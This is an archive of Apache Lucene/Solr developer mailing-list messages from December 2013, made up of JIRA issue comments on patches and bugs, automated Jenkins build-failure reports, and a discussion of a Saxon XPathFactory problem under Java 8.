date:20131202

[jira] [Commented] (LUCENE-5271) A slightly more accurate SloppyMath distance

2013-12-02 Thread Ryan Ernst (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-5271?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837432#comment-13837432
 ] 

Ryan Ernst commented on LUCENE-5271:


Thanks for the patch Gilad.  A couple comments:
* If the lat/lon values are large, then the index would be out of bounds for 
the table.  Today it will not error.  Since these are just doubles being passed 
in, I think it should still work?
* Why was this test removed? {{assertEquals(314.40338, haversin(1, 2, 3, 4), 
10e-5);}}
* Could you move the {{2 * radius}} computation into the table?
* I know this is an already existing problem, but could you move the division 
by 2 from h1/h2 to h?

> A slightly more accurate SloppyMath distance
> 
>
> Key: LUCENE-5271
> URL: https://issues.apache.org/jira/browse/LUCENE-5271
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/other
>Reporter: Gilad Barkai
>Priority: Minor
> Attachments: LUCENE-5271.patch, LUCENE-5271.patch
>
>
> SloppyMath, intriduced in LUCENE-5258, uses earth's avg. (according to WGS84) 
> ellipsoid radius as an approximation for computing the "spherical" distance. 
> (The TO_KILOMETERS constant).
> While this is pretty accurate for long distances (latitude wise) this may 
> introduce some small errors while computing distances close to the equator 
> (as the earth radius there is larger than the avg.)
> A more accurate approximation would be taking the avg. earth radius at the 
> source and destination points. But computing an ellipsoid radius at any given 
> point is a heavy function, and this distance should be used in a scoring 
> function.. So two optimizations are optional - 
> * Pre-compute a table with an earth radius per latitude (the longitude does 
> not affect the radius)
> * Instead of using two point radius avg, figure out the avg. latitude 
> (exactly between the src and dst points) and get its radius.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-trunk-Windows (32bit/jdk1.7.0_45) - Build # 3532 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Windows/3532/
Java: 32bit/jdk1.7.0_45 -client -XX:+UseParallelGC

All tests passed

Build Log:
[...truncated 50540 lines...]
BUILD FAILED
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\build.xml:420: The 
following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\build.xml:359: The 
following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\extra-targets.xml:87: 
The following error occurred while executing this line:
C:\Users\JenkinsSlave\workspace\Lucene-Solr-trunk-Windows\extra-targets.xml:158:
 Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 114 minutes 54 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.7.0_45 -client -XX:+UseParallelGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5502) A "/" in the ID itself throws an ArrayIndexOutOfBoundsException when using the composite id router

2013-12-02 Thread Anshum Gupta (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5502?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Anshum Gupta updated SOLR-5502:
---

Attachment: SOLR-5502.patch

Patch with a one liner test. 
The test tries to add a doc with a "/" in the id and fails without the patch.

> A "/" in the ID itself throws an ArrayIndexOutOfBoundsException when using 
> the composite id router
> --
>
> Key: SOLR-5502
> URL: https://issues.apache.org/jira/browse/SOLR-5502
> Project: Solr
>  Issue Type: Bug
>  Components: SolrCloud
>Affects Versions: 4.6
>Reporter: Anshum Gupta
> Attachments: SOLR-5502.patch, SOLR-5502.patch
>
>
> While using the composite-id router, if the routing-id contains a "/" in the 
> id part, the code throws an ArrayIndexOutOfBoundsException.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (LUCENE-5350) Add Context Aware Suggester

2013-12-02 Thread Areek Zillur (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-5350?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837405#comment-13837405
 ] 

Areek Zillur commented on LUCENE-5350:
--

Thanks for the feedback!
[~mikemccand]: I was wondering the same thing as I was implementing it. By 
intuition I think this should be more compact than the N suggester approach but 
I think its best to benchmark it against N separate suggesters (will update 
with the benchmark results). Also had another idea of implementing this by 
'filtering' the suggestions by contexts supplied at query-time rather than 
prefixing the context with the analyzed form. I will play around with both and 
benchmark it to see whether this would be useful in practice.
[~ppujari]: Can you expand on the deep learning algorithm part? 

> Add Context Aware Suggester
> ---
>
> Key: LUCENE-5350
> URL: https://issues.apache.org/jira/browse/LUCENE-5350
> Project: Lucene - Core
>  Issue Type: New Feature
>  Components: core/search
>Reporter: Areek Zillur
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5350.patch
>
>
> It would be nice to have a Context Aware Suggester (i.e. a suggester that 
> could return suggestions depending on some specified context(s)).
> Use-cases: 
>   - location-based suggestions:
>   -- returns suggestions which 'match' the context of a particular area
>   --- suggest restaurants names which are in Palo Alto (context -> 
> Palo Alto)
>   - category-based suggestions:
>   -- returns suggestions for items that are only in certain 
> categories/genres (contexts)
>   --- suggest movies that are of the genre sci-fi and adventure 
> (context -> [sci-fi, adventure])



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5505) LoggingInfoStream not usabe in a multi-core setup

2013-12-02 Thread Ryan Ernst (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5505?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837389#comment-13837389
 ] 

Ryan Ernst commented on SOLR-5505:
--

Thanks for the patch Shikhar.  A couple thoughts:
* This forces anyone trying to use the LoggingInfoStream to provide a 
loggerName in solrconfig.  Could the LIS constructor instead continue using the 
local logger if null is passed in?   Or have an alternate zero argument 
constructor? This way the log4j.properties settings under 
solr/example/resources are still relevant.
* You should also update the example solrconfig.xml to include info about the 
new setting.
* Could you make the simple case better, where there is only a single log file, 
by adding a prefix option to LIS, and adding the core name?

> LoggingInfoStream not usabe in a multi-core setup
> -
>
> Key: SOLR-5505
> URL: https://issues.apache.org/jira/browse/SOLR-5505
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Shikhar Bhushan
> Attachments: SOLR-5505.patch
>
>
> {{LoggingInfoStream}} that was introduced in SOLR-4977 does not log any core 
> context.
> Previously this was possible by encoding this into the infoStream's file path.
> This means in a multi-core setup it is very hard to distinguish between the 
> infoStream messages for different cores.
> {{LoggingInfoStream}} should be automatically configured to prepend the core 
> name to log messages.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Ryan Ernst (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-5355?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837381#comment-13837381
 ] 

Ryan Ernst commented on LUCENE-5355:


Did you mean to leave a commented out echo?
+1 otherwise.

> Add more support to validate the -Dbootclasspath given for javadocs generate
> 
>
> Key: LUCENE-5355
> URL: https://issues.apache.org/jira/browse/LUCENE-5355
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: general/build
>Affects Versions: 4.6
> Environment: MacOSX AppleJDK6
>Reporter: Uwe Schindler
> Fix For: 5.0, 4.7
>
> Attachments: LUCENE-5355.patch
>
>
> When Simon created the nice looking javadocs for LuSolr 4.6, he just 
> copypasted the command line from 
> http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs
> Unfortunately this does not work with AppleJDK6, because it has no rt.jar! 
> The rt.jar file is there in a completely different directory and is named 
> classes.jar. I had a similar problem when I wanted to regenerate the Javadocs 
> on my Linux box, but specified {{-Dbootclasspath}} with shell specials (e.g., 
> {{~}} for homedir).
> This patch will assist the user and will "validate" the given bootclasspath, 
> so it points to a JAR file that actually contains the runtime. Also to make 
> life easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to the 
> JDK homefolder (same like JAVA_HOME) and ANT will figure out if it is Apple 
> or Oracle or maybe only a JRE.
> In the meantime, I regenerated the 4.6 Javadocs with correct bootclasspath.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-trunk-Linux (64bit/jdk1.7.0_45) - Build # 8552 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8552/
Java: 64bit/jdk1.7.0_45 -XX:-UseCompressedOops -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 57571 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:359: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:87: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:158: 
Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 67 minutes 19 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0_45 -XX:-UseCompressedOops -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Ryan Ernst (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837368#comment-13837368
 ] 

Ryan Ernst commented on SOLR-5524:
--

Is there really a reason the key needs to be an object?  Why not just a string 
like "scaleInfo"?

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
> Attachments: SOLR-5524.patch
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (LUCENE-4381) support unicode 6.2

2013-12-02 Thread Robert Muir (JIRA)


 [ 
https://issues.apache.org/jira/browse/LUCENE-4381?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Robert Muir updated LUCENE-4381:


Attachment: LUCENE-4381.patch

here's a cleaned up patch. i think its ready.

our ICU is currently really out of date, and upgrading it allows us to delete a 
bunch of custom code.

> support unicode 6.2
> ---
>
> Key: LUCENE-4381
> URL: https://issues.apache.org/jira/browse/LUCENE-4381
> Project: Lucene - Core
>  Issue Type: Task
>  Components: modules/analysis
>Reporter: Robert Muir
> Fix For: 4.7
>
> Attachments: LUCENE-4381.patch, LUCENE-4381.patch
>
>
> ICU will release a new version in about a month.
> They have a version for testing 
> (http://site.icu-project.org/download/milestone) already out with some 
> interesting features, e.g. dictionary-based CJK segmentation.
> This issue is just to test it out/integrate the new stuff/etc. We should try 
> out the automation Steve did as well.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Updated] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Trey Grainger updated SOLR-5524:


Attachment: SOLR-5524.patch

Simple patch.  Just changing the ScaleFloatFunction function to use itself as 
the key instead of the ValueSource it is using internally (it's first 
parameter).  This seems consistent with how other ValueSources (such as the 
QueryValueSource) work, and it fixes the issue at hand.

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
> Attachments: SOLR-5524.patch
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5524?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837319#comment-13837319
 ] 

Trey Grainger commented on SOLR-5524:
-

I just debugged the code and uncovered the problem.  There is a Map (called 
context) that is passed through to each value source to store intermediate 
state, and both the query and scale functions are passing the ValueSource for 
the query function in as the KEY to this Map (as opposed to using some 
composite key that makes sense in the current context).  Essentially, these 
lines are overwriting each other:

Inside ScaleFloatFunction: context.put(this.source, scaleInfo);  //this.source 
refers to the QueryValueSource, and the scaleInfo refers to a ScaleInfo object
Inside QueryValueSource: context.put(this, w); //this refers to the same 
QueryValueSource from above, and the w refers to a Weight object

As such, when the ScaleFloatFunction later goes to read the ScaleInfo from the 
context Map, it unexpectedly pulls the Weight object out instead and thus the 
invalid case exception occurs.  The NoOp multiplication works because it puts 
an "different" ValueSource between the query and the ScaleFloatFunction such 
that this.source (in ScaleFloatFunction) != this (in QueryValueSource).

> Exception when using Query Function inside Scale Function
> -
>
> Key: SOLR-5524
> URL: https://issues.apache.org/jira/browse/SOLR-5524
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.6
>Reporter: Trey Grainger
>Priority: Minor
> Fix For: 4.7
>
>
> If you try to use the query function inside the scale function, it throws the 
> following exception:
> org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
> org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo
> Here is an example request that invokes this:
> http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Created] (SOLR-5524) Exception when using Query Function inside Scale Function

2013-12-02 Thread Trey Grainger (JIRA)

Trey Grainger created SOLR-5524:
---

 Summary: Exception when using Query Function inside Scale Function
 Key: SOLR-5524
 URL: https://issues.apache.org/jira/browse/SOLR-5524
 Project: Solr
  Issue Type: Bug
Affects Versions: 4.6
Reporter: Trey Grainger
Priority: Minor
 Fix For: 4.7


If you try to use the query function inside the scale function, it throws the 
following exception:
org.apache.lucene.search.BooleanQuery$BooleanWeight cannot be cast to
org.apache.lucene.queries.function.valuesource.ScaleFloatFunction$ScaleInfo

Here is an example request that invokes this:
http://localhost:8983/solr/collection1/select?q=*:*&fl=scale(query($x),0,5)&x=hello)



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-trunk-Linux (64bit/jdk1.7.0_45) - Build # 8551 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8551/
Java: 64bit/jdk1.7.0_45 -XX:+UseCompressedOops -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 57492 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:359: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:87: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:158: 
Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 67 minutes 18 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0_45 -XX:+UseCompressedOops -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread Erick Erickson (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5522?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5522.
--

   Resolution: Fixed
Fix Version/s: 4.7

I pulled all the code out so there's no longer a handler for updating config 
files in 4x. There is in trunk, but a blocker issue is also there to remind us 
to deal with security properly.

> Pull modifying the Solr config documents out of Solr 4.x
> 
>
> Key: SOLR-5522
> URL: https://issues.apache.org/jira/browse/SOLR-5522
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 4.7
>
>
> Follow up on SOLR-5518 and SOLR-5287. We need to add proper security to the 
> ability to write config files to Solr or there is a security problem.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Erick Erickson (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5287.
--

Resolution: Fixed

Pulled out of 4.x, and put in its own handler for 5.0

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5522?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837295#comment-13837295
 ] 

ASF subversion and git services commented on SOLR-5522:
---

Commit 1547270 from [~erickoerickson] in branch 'dev/branches/branch_4x'
[ https://svn.apache.org/r1547270 ]

SOLR-5522: Pull modifying the Solr config documents out of Solr 4.x

> Pull modifying the Solr config documents out of Solr 4.x
> 
>
> Key: SOLR-5522
> URL: https://issues.apache.org/jira/browse/SOLR-5522
> Project: Solr
>  Issue Type: Bug
>Affects Versions: 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
>
> Follow up on SOLR-5518 and SOLR-5287. We need to add proper security to the 
> ability to write config files to Solr or there is a security problem.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Re: [JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8549 - Still Failing!

2013-12-02 Thread Wolfgang Hoschek

Looks like Java's service loader lookup impl has become more strict in Java8. 
This issue on Java 8 is kind of unfortunate because morphlines and solr-mr 
doesn't actually use JAXP at all. 

For the time being might be best to disable testing on Java8 for this contrib, 
in order to get a stable build and make progress on other issues.

A couple of options that come to mind in how to deal with this longer term:

1) Remove the dependency on cdk-morphlines-saxon (which pulls in the saxon jar)

or 

2) Replace all Solr calls to JAXP XPathFactory.newInstance() with a little 
helper that first tries to use one of a list of well known XPathFactory 
subclasses, and only if that fails falls back to the generic 
XPathFactory.newInstance(). E.g. use something like 

XPathFactory.newInstance(XPathFactory.DEFAULT_OBJECT_MODEL_URI,
"com.sun.org.apache.xpath.internal.jaxp.XPathFactoryImpl", 
ClassLoader.getSystemClassLoader());

There are 14 such XPathFactory.newInstance() calls in the Solr codebase.

or 

3) Somehow remove the META-INF/services/javax.xml.xpath.XPathFactory file from 
the saxon jar (this is what's causing this, and we don't need that file, but 
it's not clear how to remove it, realistically)

Approach 2) might be best.

Thoughts?
Wolfgang.

On Dec 2, 2013, at 4:41 PM, Mark Miller wrote:

> Uwe mentioned this in IRC - I guess Saxon doesn’t play nice with java 8.
> 
> http://stackoverflow.com/questions/7914915/syntax-error-in-javax-xml-xpath-xpathfactory-provider-configuration-file-of-saxo
> 
> - Mark
> 
> On Dec 2, 2013, at 7:06 PM, Policeman Jenkins Server  
> wrote:
> 
>> Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8549/
>> Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC
>> 
>> 3 tests failed.
>> FAILED:  
>> junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest
>> 
>> Error Message:
>> 1 thread leaked from SUITE scope at 
>> org.apache.solr.hadoop.MorphlineReducerTest: 1) Thread[id=17, 
>> name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] 
>> at sun.misc.Unsafe.park(Native Method) at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)   
>>   at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>  at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>  at 
>> java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277) 
>> at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>> 
>> Stack Trace:
>> com.carrotsearch.randomizedtesting.ThreadLeakError: 1 thread leaked from 
>> SUITE scope at org.apache.solr.hadoop.MorphlineReducerTest: 
>>   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest]
>>at sun.misc.Unsafe.park(Native Method)
>>at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
>>at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>>  at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)
>> 
>> 
>> FAILED:  
>> junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest
>> 
>> Error Message:
>> There are still zombie threads that couldn't be terminated:1) 
>> Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest] at sun.misc.Unsafe.park(Native 
>> Method) at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)   
>>   at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>  at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>  at 
>> java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277) 
>> at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
>> 
>> Stack Trace:
>> com.carrotsearch.randomizedtesting.ThreadLeakError: There are still zombie 
>> threads that couldn't be terminated:
>>   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
>> group=TGRP-MorphlineReducerTest]
>>at sun.misc.Unsafe.park(Native Method)
>>at 
>> java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
>>at 
>> java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
>>at java.util.concurrent.CountDownLatch

[JENKINS] Lucene-Solr-trunk-MacOSX (64bit/jdk1.7.0) - Build # 1084 - Failure!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-MacOSX/1084/
Java: 64bit/jdk1.7.0 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

All tests passed

Build Log:
[...truncated 28649 lines...]
   [junit4] JVM J0: stderr was not empty, see: 
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/solr/build/contrib/solr-mr/test/temp/junit4-J0-20131203_024237_409.syserr
   [junit4] >>> JVM J0: stderr (verbatim) 
   [junit4] 2013-12-03 02:43:15.791 java[231:6403] Unable to load realm info 
from SCDynamicStore
   [junit4] <<< JVM J0: EOF 

[...truncated 38787 lines...]
BUILD FAILED
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/build.xml:420: The following 
error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/build.xml:359: The following 
error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/extra-targets.xml:87: The 
following error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/extra-targets.xml:158: Source 
checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 136 minutes 23 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0 -XX:+UseCompressedOops 
-XX:+UseConcMarkSweepGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
